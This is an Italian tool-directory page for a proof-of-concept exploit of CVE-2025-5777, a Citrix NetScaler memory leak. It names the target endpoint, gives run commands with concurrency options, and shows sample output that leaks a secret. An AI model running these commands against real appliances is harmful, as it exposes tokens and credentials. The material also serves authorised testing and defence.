Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5777 — Prova di concetto per la perdita di memoria di Citrix NetScaler | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration TestingRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Prova di concetto per la perdita di memoria di Citrix NetScaler

Vedi Repository
2431 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-5777 - PoC per perdita di memoria in Citrix NetScaler

📌 Descrizione

Questo script sfrutta una vulnerabilità critica di divulgazione della memoria nei dispositivi Citrix NetScaler ADC/Gateway, identificata come CVE-2025-5777 (soprannominata CitrixBleed 2). Innesca una perdita di memoria tramite l'endpoint /p/u/doAuthentication.do, rivelando memoria non inizializzata contenente dati sensibili come frammenti XML, token e potenzialmente credenziali.

  • 📅 ID CVE: CVE-2025-5777
  • ⚙️ Impatto: Divulgazione di informazioni
  • 🧑‍💻 Autore: [0xgh057r3c0n]
  • 🧵 Concorrenza: Asincrona con aiohttp
  • 📦 Dipendenze: aiohttp, colorama

🚀 Caratteristiche

  • Motore asincrono di richieste di massa basato su asyncio + aiohttp
  • Dump esadecimale dei frammenti di memoria leakati
  • Rilevamento automatico della perdita di memoria <InitialValue>
  • Modalità verbosa per debug e anteprima delle risposte
  • Gestione elegante delle interruzioni (Ctrl+C)

🧪 Utilizzo

python3 CVE-2025-5777.py http://<target> [options]

🔧 Opzioni

OpzioneDescrizione
-v, --verboseAbilita l'output di debug verboso
-p <proxy>Usa un proxy HTTP (es. http://127.0.0.1:8080)
-t <threads>Numero di richieste concorrenti (predefinito: 10)

📥 Esempio

python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 Output di esempio

_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...

⚠️ Disclaimer

Questa prova di concetto è destinata esclusivamente a test di sicurezza autorizzati e a fini educativi. La scansione o lo sfruttamento non autorizzato di sistemi che non possiedi è illegale.


Scarica lo strumento